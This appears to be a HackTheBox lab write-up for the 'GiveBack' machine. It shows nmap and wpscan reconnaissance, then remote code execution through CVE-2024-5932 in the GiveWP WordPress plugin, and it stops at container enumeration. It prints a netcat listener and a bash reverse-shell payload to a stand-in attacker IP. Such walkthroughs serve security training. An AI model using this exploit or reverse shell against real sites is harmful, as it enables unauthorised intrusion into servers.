HackTheBox - GiveBack Writeup

Difficulty: Medium
OS: Linux

Reconnaissance

Nmap Scan

nmap -sC -sV -p- giveback.htb

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_  256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp open  http    nginx 1.28.0
|_http-generator: WordPress 6.8.1
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: nginx/1.28.0
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI

Key Findings:

  • SSH on port 22
  • WordPress 6.8.1 running on nginx 1.28.0
  • Domain: giveback.htb

Initial Access - WordPress Exploitation

WordPress Enumeration

wpscan --url http://giveback.htb

Discovery: The website uses the GiveWP plugin, which is vulnerable to CVE-2024-5932.

Exploiting CVE-2024-5932 (GiveWP RCE)

Exploit Repository: CVE-2024-5932

Setup:

cd CVE-2024-5932
pip install -r requirements.txt

Start Listener:

nc -lvnp 1234

Execute Exploit:

python3 CVE-2024-5932-rce.py \
  -u "http://giveback.htb/donations/the-things-we-need/" \
  -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/1234 0>&1'" 2>&1 | tail -15

Result: Reverse shell obtained!

An image to describe post

Container Enumeration

Environment File Discovery

cat /opt/bitnami/wordpress/wp-content/uploads/env.txt

Key Findings:

BETA_VINO_WP_MARIADB_SERVICE_HOST=10.43.147.82
LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241

Important Discovery: Another container running at 10.43.2.241:5000

#wordpress #exploit #kubernetes